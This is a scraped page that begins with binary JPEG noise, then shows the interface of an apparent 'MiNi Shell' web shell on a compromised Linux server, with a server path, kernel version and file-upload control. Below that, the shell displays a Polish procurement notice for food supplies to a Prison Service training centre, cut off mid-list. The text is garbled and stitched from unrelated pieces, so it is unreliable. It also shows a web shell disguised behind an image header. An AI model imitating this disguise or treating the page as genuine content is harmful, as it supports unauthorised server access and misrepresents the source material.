JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200901/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200901/579391-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 579391-N-2020 z dnia 2020-09-01 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Ośrodek Doskonalenia Kadr Służby Więziennej w Olszanicy</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawy artykułów ogólnospożywczych</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Ośrodek Doskonalenia Kadr Służby Więziennej w Olszanicy</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">384899520</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Olszanica</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">222</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">38-722</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Olszanica</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">podkarpackie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">134617450</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">sebastian.ukleja@sw.gov.pl, odk_olszanica@sw.gov.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax"></span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.sw.gov.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Ośrodek Szkolenia Służby Więziennej</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.zp.sw.gov.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.zp.sw.gov.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty należy przesyłać drogą pocztową na adres Ośrodka Doskonalenia Kadr Służby Więziennej w Olszanicy lub składać osobiście w sekretariacie w ośrodku.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Ośrodek Doskonalenia Kadr Służby Więziennej w Olszanicy, Olszanica 222, 38-722 Olszanica</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawy artykułów ogólnospożywczych</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">DKw.2232.15.2020.SU</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. CPV 03212213-6 Groch łuskany połówki Op. jedn.0,4kg - 5kg. Bez obcych zapachów, szkodników i uszkodzeń mechanicznych. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 200	kg. 2. CPV 03221210-1 Fasola biała "Jaś". Op. jedn. 0,4kg - 5kg. Bez obcych zapachów, szkodników i uszkodzeń mechanicznych. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 300	kg. 3. CPV 15331400-1 Groszek konserwowy. Opakowanie jednostkowe: 0,4 kg - 1kg. Klasa I. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 140 kg. 4. CPV 03221260-6 Grzyby suszone Podgrzybek. Kapelusze całe, zdrowe, bez zanieczyszczeń organicznych, smaki zapach charakterystyczny dla grzybów suszonych. Opakowanie jednostkowe: folia spożywcza, waga 100g - 200g. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 10	kg.	5. CPV 15331110-1 Koncentrat barszczu czerwonego, zagęszczony sok z buraków ćwikłowych nie mniej niż 12%. Produkt pasteryzowany. Op. Jedn. 330 ml – 400 ml. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 100 litrów. 6. CPV 15891000-0 Żurek. Żur naturalny, pasteryzowany, skład: mąka żytnia i woda. Opakowanie jednostkowe słoiko wadze 280-330g. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 200 kg. 7. CPV 15331110-1 Seler konserwowy. Opakowanie jednostkowe 0,3kg -1kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 120 kg. 8. CPV 15331135-2 Pieczarki marynowane całe. Produkt pasteryzowany. Op. Jedn. 0,3 kg -1kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 140 kg. 9. CPV 15331400-1 Kukurydza konserwowa. Op. jedn. 0,3kg-1kg. Klasa I. Termin przydatności do spożycia min. 3 miesiące od daty dostawy.	W ilości 140 kg.	10. CPV 15331400-1 Chrzan tarty. Korzeń chrzanu nie mniej niż 50%, Klasa I. Opakowanie jednostkowe 0,16 kg – 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy.	W ilości 120 kg.	11. CPV 15331420-7 Pomidory krojone bez skórki, pomidory minimum 50%. Opakowanie jednostkowe 0,4 kg – 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy.	W ilości 300 kg.	12. CPV 15331420-7 1 Pomidor suszony w oleju. Pomidory suszone minimum 55%, Opakowanie jedn. do 0,8 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 60	kg. 13. CPV 15331425-2 Koncentrat pomidorowy 30% wyprodukowany ze świeżych pomidorów, bez żadnych dodatków, bez konserwantów. Op. jedn. 180g-500g. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 200 kg. 14. CPV 15331464-7 Fasola konserwowa czerwona. Zawartość fasoli bez zalewy minimum 55%. Opakowanie jednostkowe 0,3kg-1kg. Klasa I. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 100 kg.15. CPV 15331500-2 Ogórek konserwowy. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 1200 kg.	16. CPV 15331500-2 Papryka konserwowa. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 600 kg.	17. CPV 15411100-3 Olej rzepakowy filtrowany na zimno z pierwszego tłoczenia dopuszczony do żywności. Zastosowanie: do smażenia, pieczenia, sosów, surówek. Opakowanie jedn: butelka do 1 litr. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 1000 litr.	18. CPV 15614100-6 Ryż biały – Ryż paraboliczny długoziarnisty. Cechy dyskwalifikujące: obce zapachy, posmaki, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe do 5 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy.W ilości 1000 kg. 19. CPV 15613000-8 Kasza jęczmienna Produkt otrzymany z jęczmienia, struktura i konsystencja- sypka, bez grudeki zawilgocenia. Cechy dyskwalifikujące: obce zapachy, posmaki, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe do 5 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 1000 kg.	20. CPV 15613000-8 Kasza manna. Produkt otrzymany z przemiału pszenicy, struktura i konsystencja- sypka, bez grudek i zawilgocenia. Niedopuszczalny obcy zapach, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe do 5 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 100 kg.	21. CPV 15613000-8 Kasza gryczana Produkt otrzymany z gryki, struktura i konsystencja- sypka, bez grudeki wilgotności. Niedopuszczalny obcy zapach, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenie, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe do 5 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 400 kg.	22. CPV 15623000-1 Mąka ziemniaczana. Skrobia ziemniaczana otrzymana z ziemniaków; struktura i konsystencja- sypka, bez grudek, barwa biała. Niedopuszczalny zapach obcy, stęchły, zanieczyszczenia organiczne, objawy pleśnienia, psucia, zawilgocenia, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 100 kg.	23. CPV 15898000-9 Drożdże. Drożdże świeże. Opakowania jednostkowe do 100g. Termin przydatności do spożycia min. 7 dni od daty dostawy. W ilości 20 kg. 24. CPV 15811300-9 Ciasto francuskie. Ciasto francuskie chłodzone-półprodukt garmażeryjny. Opakowanie jednostkowe do 500 g. Termin przydatności do spożycia nie krótszy niż 15 dni od daty dostawy. W ilości 40 kg. 25. CPV 15811300-9 Tortilla – okrągłe placki z mąki pszennej lub kukurydzianej o średnicy 25-30 cm. Termin przydatności do spożycia min. 30 dni od dostawy do magazynu. W ilości 50 kg.	26. CPV 15851100-9 Makaron nitki. Makaron jajeczny. Niedopuszczalny obcy zapach (np. stęchły, pleśni, gorzki), zanieczyszczenia mechaniczne i organiczne, objawy pleśnienia, psucia, zawilgocenia, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jedn. do 2 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy.	W ilości 300 kg.	27. CPV 15851100-9 Makaron spaghetti. Makaron z mąki pszennej w formie długich nitek o długości 20-30 cm. Opakowanie jedn. do 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 400 kg. 28. CPV 15851100-9 Makaron – różne rodzaje (świderki, kokardki, wstążki, rurki). Makaron jajeczny. Produkowany ze świeżych jaj i najwyższej jakości mąki. Niedopuszczalny obcy zapach (np. stęchły, pleśni, gorzki), zanieczyszczenia mechaniczne i organiczne, objawy pleśnienia, psucia, zawilgocenia, obecność szkodników żywych, martwych oraz ich pozostałości. Opakowanie jedn. do 2 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy.	W ilości 3500 kg.	29. CPV 15831200-4 Cukier biały. Opakowanie jedn: torba papierowa 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy.	W ilości 1000 kg.	30. CPV 15861000-1 Kawa rozpuszczalna, naturalna 100%. aglomerowana. Opakowanie jedn. do 300 g. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 300 kg. 31. CPV 15861100-2 Kawa naturalna 100% pakowana próżniowo, mielona. Opakowanie jedn. do 500g. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 300 kg. 32. CPV 15864100-3 Herbata expresowa – torebki ze sznureczkiem. Waga 1 torebki 2 g. Opakowanie zbiorcze do 100 szt. Możliwość zakupu herbaty pakowanej pojedynczo w saszetce. Różne rodzaje smaków. W ilości 120 kg. 33. CPV 15613311-1 Płatki czekoladowe. Płatki zbożowe o smaku czekoladowym, otrzymane z przetworzonych ziaren zbóż. Struktura i konsystencja- sypka, w postaci drobnych różnokształtnych płatków lub kulek. Płatki niepokruszone, smak lekko słodki. Niedopuszczalny obcy smak, zapach, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenia. Opakowanie jednostkowe- folia hermetycznie zamknięta 250 g- 500g. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 500 kg. 34. CPV 15613311-1 Płatki kukurydziane. Płatki kukurydziane otrzymane przez przetworzenie ziaren kukurydzy. Płatki niepokruszone, barwa żółta, smak lekki słodki. Niedopuszczalny obcy smak, zapach, zanieczyszczenia, objawy pleśnienia, psucia, zawilgocenia. Opakowanie jednostkowe- folia hermetycznie zamknięta 250 g- 600g. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 500 kg.	35. CPV 15831600-8 Miód porcjowany Miód pszczeli nektarowy wielokwiatowy. Opakowanie jednostkowez tworzywa sztucznego -waga 20g-25g. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 160 kg.	36. CPV 15831600-8 Miód naturalny. Miód pszczeli nektarowy wielokwiatowy. Opakowanie jednostkowe słoik 0,25kg -1,3kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 40 kg. 37. CPV 15842200-4 Krem do smarowania pieczywa. Smak orzechowy, kakaowy lub mieszany. Opakowanie jednostkowe z tworzywa sztucznego - waga 15g – 30 g. Termin przydatności do spożycia min. 3 miesiące od daty dostawy.	W ilości 160 kg. 38. CPV 15332290-3 Dżem porcjowany Dżemy owocowe o różnych smakach np. brzoskwiniowy, truskawkowy, wiśniowy, czarna porzeczka. Opakowanie jedn. z tworzywa sztucznego o wadze 20 g – 25 g. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 160 kg.	39. CPV 15332290-3 Dżemy - owocowe o różnych smakach, opakowanie jedn. o wadze 0,2 kg-3 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 100 kg.	40. CPV 15332230-5 Marmolada twarda – zawartość owoców min. 110 g na 100 g gotowego produktu. Opakowanie jedn. do 5 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 100 kg.	41. CPV 15831200-4 Cukier puder. Cukier biały kryształ drobno zmielony. Opakowanie jedn. do 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 20 kg.	42. CPV 15830000-5 Cukier wanilinowy Opakowanie jedn. torebka papierowa 10g- 50 g. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 2 kg. 43. CPV 15899000-6 Proszek do pieczenia – opakowanie jedn. 10 g-50 g. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy.	W ilości 5 kg. 44. CPV 15872000-1 Cynamon mielony. Barwa jasnobrązowa do brunatnej, jednolita. Zapach swoisty, intensywny, bez zapachów obcych. Smak słodko- piekący, bez posmaków obcych. Opakowanie jedn. do 0,5 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 6 kg.	45. CPV 03111300-5 Słonecznik łuskany – wysuszone łuskane ziarna słonecznika. Opakowanie jedn. do 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 30 kg.	46. CPV 15332410-1 Morele suszone. Morele suszone bez pestek. Opakowania jednostkowe do 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 30 kg.	47. CPV 15332410-1 Śliwki suszone kalifornijskie. Śliwki suszone bez pestek. Opakowanie jedn. do 1 kg. Termin przydatności do 